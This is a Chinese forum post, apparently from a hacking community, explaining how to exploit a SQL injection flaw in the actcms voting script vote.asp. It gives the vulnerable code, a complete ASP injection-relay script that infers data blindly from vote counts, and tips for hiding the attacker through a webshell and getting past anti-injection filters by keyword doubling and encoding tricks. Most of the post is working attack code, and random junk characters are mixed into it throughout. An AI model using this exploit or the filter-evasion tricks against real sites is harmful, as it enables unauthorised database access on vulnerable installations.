7 O6 ^8 Y/ q. O* z& p; u看到ninty大牛的blog的一篇文章, z* d: J" D8 U; S
链接标记[url]http://www.forjj.com/?action=show&id=80[/url]1 L6 u$ P# O- {
关于actcms漏洞的利用 by 3x qq:3818625893 j( ~, ~9 \4 o$ s% w S9 X8 n
转载请注明以上( U( n* T% A3 M; \
漏洞文件:
" R- p0 T! H( [( n4 ?. X/ [: P/plus/vote/vote.asp
# I+ }# G. \9 A3 J, g; h! g; t代码: 链接标记预览源代码 链接标记打印链接标记关于1if request("voted").count=0 then & W' {4 b3 s0 l4 H
. d0 u# z5 b" C! c) K. A- H6 P
2 response.write "<script>alert('请选择投票项目。');window.close()</script>"
3 a0 _$ L! D, @8 G" G
' S7 b0 b$ P7 C1 X3 e' N' N3 response.end
. q; L# J3 Z( [2 r3 k" f% E$ P& `, S- W
. J/ o7 r0 f% C/ t* f4 end if
1 d; M& T% S2 l* Q+ @2 u" z
' L! T4 O9 d% L) V! H5 for i=1 to request("voted").count
9 T8 P; G+ J" V5 Y1 b4 Z
8 W4 @4 W4 X* S, R/ @6 actcms.actexe("Update vote_act set VoteNum=VoteNum+1 where id="&request("voted")(i)) " C7 A$ _% m& l, K' C0 M( t
+ I$ T- D8 K+ i! ^; Y+ h7 next
' q9 } q8 J. I$ e
6 X+ r1 j9 z" y4 D8....
) e# h9 w. E6 [/ Y) Z: f2 M* S" ]5 i k9 \" f* G- p6 K) B
9response.Redirect "index.asp?id="&id&"" + Q [! ]3 o; D( j1 D
投票结束回跳转回index.asp这个投票结果页面
' b0 a/ r" A; r如果投票成功票数加1; ?$ U! E& ~9 e: Q9 o2 N* P* o
失败票数不变) t. e8 g6 U' H& S" k
如图:5 ?! ?7 C3 ^" V4 G8 I ~, n- e7 v
http://www.t00ls.net/images/default/attachimg.gif http://www.t00ls.net/attachments/month_0912/091227132032ef432aa12b1267.jpg链接标记下载 (3.95 KB)
8 _' U ^0 M0 m( e+ |) ^4 H
* M. k+ \, K" p+ @2009-12-27 13:20
' \' H$ C: I) C3 C/ V* [2 q0 [5 v; }! }$ d( w" o4 x. ~4 D
利用这点来注入,由于ninty大牛学java的,但是java运行环境实在是。。。。不说了
7 P: ]: D+ U0 ^/ @" Q' g: h( d: _; m9 `) K+ i; \
本帖隐藏的内容需要回复才可以浏览
' D2 T% B% ]4 G# B* E我们用注入中转来实现这个注入具体代码如下:% q9 ]- V$ }& j) G+ ?7 O
先用寂寞的刺猬大牛的注入中转生成jmget.asp) N+ A5 |2 z- b
注入地址:http://localhost/actcms/plus/vote/vote.asp: B7 D4 m7 o) z' [ ?; L9 L
注入键值:id=1&voted=-1 or 1= '这里这样换的话就有学问了,不用去判断有什么投票选项: k" A' R8 G4 ]% s* e8 R# t. `
( x) o. G" W+ W- ]# j然后进行修改变成如下代码: 链接标记预览源代码 链接标记打印链接标记关于01<% ) s5 J2 l% H* D5 D: i3 Z1 K5 e" M
! j( M+ Q3 m, U02JmdcwName=request("jmdcw") $ n7 c; K {3 c- Y- @ _+ r
* a& V8 v* W9 O/ H% y7 q
03' 注入中转站 GET 版,BY 寂寞的刺猬 [L.S.T]
5 G2 ~2 c9 ]& L! U, f/ X1 i* a r# w0 r" w+ V
04JmStr="id=1&voted=-1 or 1="&JmdcwName
5 N3 F' o- S6 y! L+ u9 J
3 ?" w# R3 R4 E7 M/ B05JmStr=URLEncoding(JmStr) 8 _6 w: w, e% \$ i5 O
2 p. @% \# z' F" \7 B( r) Q ?6 `
06JMUrl="链接标记http://localhost/actcms/plus/vote/vote.asp"
: J9 F7 Y3 B# ?* }/ ]8 R3 H, K1 a
7 R; O, q4 R$ u- ^5 z6 F07testurl="链接标记http://localhost/actcms/plus/vote/index.asp"( S6 d3 q6 o; P$ j) q
7 n, s& X; F( [0 X3 P7 c, O08testurl=testurl & "?" & JmStr $ m. y, f2 y* i6 m- a
& y! V" x+ Z/ |6 i6 K/ n& F$ L
09JMUrl=JMUrl & "?" & JmStr
s( L9 E6 [: m+ g
* v* l7 R9 Z5 G9 N2 y# x10JmRef="链接标记http://localhost/actcms/plus/vote/vote.asp"1 Z( p0 N' v4 X' X
# {9 {' L: U. v& L0 s
11JmCok="ASPSESSIONIDAQACTAQB=HKFHJOPDOMAIKGMPGBJJDKLJ;") j# X" V- S% m7 O7 c
+ K' C+ r5 Q: e% `/ |
12JmCok=replace(JmCok,chr(32),"%20")
+ T6 Q) |, ~! H; G/ d2 e7 h% P% l4 ?; j: s% D
13test1=getSt(PostData(testurl,JmStr,JmCok,JmRef)) '投票前投票记录 getSt为返回投票数的函数
# x4 F; r2 c9 T- J/ T5 O' b2 `+ ~% R D8 y; N$ R2 q1 f
14 ) z3 Y6 R2 o; N8 o
# x* c0 [# j, @4 d6 ~6 W
15re=PostData(JMUrl,JmStr,JmCok,JmRef) '投票
! a6 p# F; w0 H( c9 [- j0 D" z1 K/ a1 ^0 U- R/ q |+ P$ {
16
* s) f$ e0 h( v, h. Y; ]' u) `9 N5 u
) U( V ^/ l9 M, T17test2=getSt(PostData(testurl,JmStr,JmCok,JmRef)) '投票后的投票记录
8 G: w/ r# d* S- `2 u+ s7 W( Y$ T: m# O" G& D% H
18response.write test1&""&test2&""# V7 @1 X* ~$ z3 N
2 p y8 O: H3 `/ @+ G' J, S
19
/ a' Y4 q- z5 v* ], ]" }$ R) e) |$ h% ?* W! h, c& c9 ~
20if test1=test2 then '如前后记录相等,表示失败 - N. @% w( k" A1 O
1 v: Z- w) O, F/ b" q2 R. s* k( \! b' k
21 response.write "failed"
8 w7 \$ y, ^3 ]& s+ z& k5 ~( h& i8 X" m/ O& v! a3 N" r
22else ' Q$ _8 C9 {4 r8 k: Q
. G* X- l; F1 I, f2 b1 L4 p8 P0 B23 response.write "succeed"
) a. P& p n) W9 |' S
3 z0 E3 X5 M* `8 [3 X8 i4 E" t( @24end if
9 f2 W' D Y) ~8 B8 r2 m* \2 E K% x8 ?4 z7 I. F4 D7 i6 F
25 6 {) U5 H, ?8 Z
( W' C/ q* X" s0 P+ A- ^26response.write "by 3x"' c+ S; j& b, w) v( _* F; _1 H
, C3 g$ S4 N/ [) x4 e5 s# \27 : L4 u$ X: c* U0 D. X: w# W
5 E' U9 z. ~! W0 e0 x3 y, r28
. X# v7 ]3 a! p! r7 l: u! `/ ?6 h$ b3 x! z5 \( }
29Function PostData(PostUrl,PostStr,PostCok,PostRef) 1 K8 x* T; D$ A
4 h* g! Z- R' h, z) f- }* r9 J
30Dim Http $ H0 R" v: i& j. r, S5 R# P
- I+ ]/ C# U; L& H& Z! R2 g3 p31Set Http = Server.CreateObject("msxml2.serverXMLHTTP") ) `( B5 F. J' e+ i- i
+ G% ?9 R( Z8 `! _5 Q) u% v
32With Http 1 z" s, j3 r( r3 D4 U
' d/ X7 S" }9 e$ c3 @ T! y
33
& u1 a! d; U6 W( |1 p) x& N
* c0 d/ b" n, Y% Q& I4 Z34.Open "GET",PostUrl,False0 u8 X! f+ c) t9 ]3 O
1 u: {* S3 a: f) x35.SetRequestHeader "Content-Type","application/x-www-form-urlencoded"5 _* ?# E( e: T4 }
) O9 Z( L# D* ^. |7 r% ?
36.SetRequestHeader "Referer",PostRef * p7 e2 E G9 x+ A4 i7 X
9 ?; \, t" l- a+ @0 v, b9 H/ o
37.SetRequestHeader "Cookie",PostCok
. H4 o. a5 ?. s' V" V
& {: S3 c$ Q; G- k8 ]; H& }38.Send () # v8 ?- b% R+ P0 e
# P, U6 Y6 R- f% v39PostData = .ResponseBody 4 r! r: ^/ t5 F- e
4 V+ F2 B/ |. }6 D* r40End With# k6 u2 J% g2 p
Q M" Z, ]7 n% E* g4 s3 ~
41Set Http = Nothing) D3 j9 U9 U* ?; V$ t8 i
! Y8 J; c: W% K: f, I% s' w/ X: R
42PostData =bytes2BSTR(PostData) 6 E2 A c' m; N0 \1 u
5 z! `; I6 l8 [ I# \, y8 v0 S; p43End Function$ a- _2 K$ G" w* J
7 U1 G1 T$ {& G44 ! E* ~) @' J; a$ A
' c5 s. O' j1 s/ `, v7 |; a
45
9 g7 o* E1 M' d% s+ T( O
* d6 B( }$ z/ y( M0 U: f k" w46Function bytes2BSTR(vIn) 4 d# F0 O- b) J: n' B8 J a
4 D4 D/ |& n; c1 q47Dim strReturn X x k, L }$ V3 `
8 Q9 ~( n' i" Y- n ]" l
48Dim I, ThisCharCode, NextCharCode $ ] T- v( x, Q
1 T* L8 X! \* x8 ?* m9 d; W
49strReturn = ""
8 w% E, ~& m+ W: L& R s% z7 n A: Z+ ~& n$ A! }4 H
50For I = 1 To LenB(vIn) 7 X6 Q% v4 G3 P, z3 S* m2 z9 e7 ?* u
8 v* Q; v1 k- f* H+ G( R
51ThisCharCode = AscB(MidB(vIn, I, 1)) $ n/ B) G' y4 ]# r
$ r7 E1 W4 P% R
52If ThisCharCode < &H80 Then8 [- s9 Y" I7 k5 T% ~; ^
2 O; j' L* l6 M' R' U53strReturn = strReturn & Chr(ThisCharCode) ' U. C/ q; I) O7 }, ^
' w' A$ ?: J. G0 `; t
54Else
- c2 t1 A. T( J! Z& S6 |0 ^, d5 D# J+ z6 h" o' @# B. @1 ~0 K
55NextCharCode = AscB(MidB(vIn, I + 1, 1)) 2 C) \) L/ ~. s0 N
# K9 p' o) [9 {* P7 U+ B% T; U5 s
56strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) ) C" U% N9 B4 t- @6 o8 z
' b' M) `' Z5 n: N) o8 [4 r G57I = I + 1 * B; y" g3 V# T- f
+ x; p) t$ ^/ D* |9 q58End If+ [3 z4 o+ e1 k& H) ~5 s* m
# z& n; w" F/ u9 o59Next
' {: V5 Y: f, V* v8 O- P% N4 z
& M6 N% [* x2 h# M: c! S3 t4 ?60bytes2BSTR = strReturn
+ G. f5 N' f' u- Y+ J" P4 H7 G4 |4 L3 ]
61End Function
7 m1 g ~, Z+ y, ]
5 _0 Z* a2 a& ^/ t+ ]62 & m( u( m+ H. f- a8 [
- ?: p9 l, N) L' I6 U0 n1 T
63Function URLEncoding(vstrin) $ ~7 e/ T3 j5 w9 @
% V, j# j$ P5 ~! n! @8 s8 x64strReturn=""
0 w1 g* M9 t, {% p, T$ E2 w
! G/ D3 J/ A& Q E65Dim i ! a" Q5 X- X i: d$ H; r' r( V
& |6 [6 r: S6 V2 ~. R5 R/ i+ w66For i=1 To Len(vstrin)
% f/ v) C- Y* O% ~/ X
6 K# E% B/ e/ t: `7 @ w& Q: ~67ThisChr=Mid(vstrin,i,1) 0 z1 N$ F' s* W- @1 d
0 E6 r/ ?2 l$ e% z
68if Abs(Asc(ThisChr))< &HFF Then% N1 O1 d7 A: |. D
6 k) B. N) }4 ?4 V, |* ~
69strReturn=strReturn & ThisChr
0 s; ^, Z3 @+ q; U' O
1 L( c2 q' ~8 i; A w2 w5 X: u70Else
; U, T l" ~. N& ^8 h3 Y! v
1 l3 y0 L8 `2 w. \4 [8 _$ _+ z7 u71InnerCode=Asc(ThisChr) # X5 |3 e$ R A( F& m$ j7 R
8 ?3 [( j5 t! K; y: W5 | K5 G
72If InnerCode<0 Then
! r4 f: h2 K& S% e- V6 J k% d, ]5 l( c f3 l0 w" W3 k
73InnerCode=InnerCode + &H10000
0 w" j4 J6 x, Q+ B( M* H& }) j- `& ~+ Q' E" `
74End If' f9 R5 h, Q4 |' m- a. a
; |7 X- L4 s5 ]
75Hight1=(InnerCode And &HFF00) \&HFF ) z: v; G* j+ @' ?/ L2 Z
/ _- Y; ~0 I. Q- k76Low1=InnerCode And &HFF
; t: D9 {0 i' \" l, W; T* l! d# A1 j# ~0 Y2 P
77strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1) 0 {9 L$ D6 Q" b: U
3 q \# `* M, {) W# d5 R; @6 ?78End if
8 r& ]0 R6 o, {( z4 ], K
2 `, J& W" ^ j- e. T) d79Next* K7 Y1 m8 N J& Q
' _# A, I3 s ~6 d, n0 t80strReturn=Replace(strReturn,chr(32),"%20") '转换空格,如果网站过滤了空格,尝试用/**/来代替%20 4 X9 ?, }% b6 x. z7 E
6 `" ]% [- A) ]4 V |
81strReturn=Replace(strReturn,chr(43),"%2B") 'JMDCW增加转换+字符
& H3 @/ q0 C4 @4 s. C2 c! |# f+ s. |4 S1 q, _+ U' L1 Q
82'strReturn=Replace(strReturn,过滤字符,"转换为字符") '在此增加要过滤的代码
% G4 h6 N( Z6 w l2 a. r+ g5 R* I9 S# S- L: p: h8 g; W
83URLEncoding=strReturn
9 p2 Y7 [3 u! g( V4 W
7 A+ O) S2 }! Q- y84End Function, H3 u$ s# ^$ r l" U n" z
6 U# V% Q; [; L! S
85
. |8 @* i& q) l9 v
5 ]5 a9 n" e* ]: T. H- ]8 p86function getSt(body)
8 f) ~# B! `' i7 Q4 \$ h3 _
2 C4 w Y1 z- X" Z8 N) r( Y3 p87 startpot=instr(body,"投票人数:")+len("投票人数:") , s2 |1 @" N1 `
& Q) Q% M" M% z2 J
88 endpot=instr(startpot,body," ") 5 n" i# U N0 x' m) r4 }
5 p% o) R& o: L o7 M0 w Y' T% f
89 getSt=mid(body,startpot,endpot-startpot) $ d" Q$ Y" O* U S: `
; H7 h; U/ n1 |90end function
; B1 l; W! O# B7 ^9 Q7 r3 C* f0 U8 ?/ M- A; z
91%>
' }; w5 ~% f9 Y1 w3 ~注入地址就是http://localhost/vote.asp?jmdcw=1 '我把jmget.asp改成vote.asp了7 l8 A" r0 m4 p
测试下效果:; y. K+ q, a2 a& v% y
投票成功:
- e' l% r% U/ F! Y( L' _, P% Rhttp://www.t00ls.net/images/default/attachimg.gif http://www.t00ls.net/attachments/month_0912/091227132987c71b583da9fb1a.jpg链接标记下载 (15.4 KB)
A, h& ^, u" H- o( D4 g& f6 ]' _$ _9 R' M' T6 R" D
2009-12-27 13:29
% M) i% E( y% G6 T* a投票失败4 c2 ` P! \0 T8 W6 d. E
http://www.t00ls.net/images/default/attachimg.gif http://www.t00ls.net/attachments/month_0912/09122713294089aca533bb1d18.jpg链接标记下载 (13.72 KB)
" g' T" N8 H! Z
; D% b! s( x+ j \7 R* N& L2009-12-27 13:293 P G: f/ _9 ]0 s# k# b2 [3 ^
-------------------------------------------------------------------------------* y" r$ i% x3 Z# j! v
再补充下。。。这个用明小子等去注我发现不行。。。总结了一下原因,明小子等注入工具是多线程的,而这个投票人数的变量没进行锁的机制。。。所以; R3 W) Y+ T" j9 B4 s
很抱歉。。。只能用单线程工具去注入。。。。。
7 I4 \; ?% d- E* U+ T& R所以失败。。。不好意思。。。* e, C" ~& i) C& p4 M, ^2 O- o
-------------------------------------------------------------------------------
$ A$ u; ^' i7 S5 A1 f% o
7 l" L9 I! W% I) m! ~ x7 L+ U注入中转的一些其他应用
/ `& N. d# ~- m: G [其实寂寞的刺猬大牛给我们提供这款基于xmlhttp的傻瓜式中转工具实在是太方便我们小菜了
, X# M3 z. |5 t$ ^1.普通的get型的注入点如果中转一下,放到我们的webshell上跑,有效的隐藏我们的id6 i6 e% F! x; j2 O T
2.post注入转成get型的注入,方便我们使用工具来跑5 z! N/ q { p6 K' C( g2 d
3.在一些cms或者一流拦截系统,过滤了selelct等关键词,这里的过滤指的是replace,我们可以在代码中进行转化,replace(jmstr,"select","sselectelect"),这样我们就可以用工具了,对于一流拦截的突破就replace(jmstr,"%20","%09")
' R# _' U! t% G }4.在某些防注入系统中的突破,上次我遇到一个防注入,大家应该也很熟悉,可以通过id--->%69d来绕过,但是如果是post的呢?我把他中转成get型的,但是注入键值我改成%69d=,成功绕过: {# G5 ~- u3 h' H
1 K! G' p9 I/ {* ], k& y% E |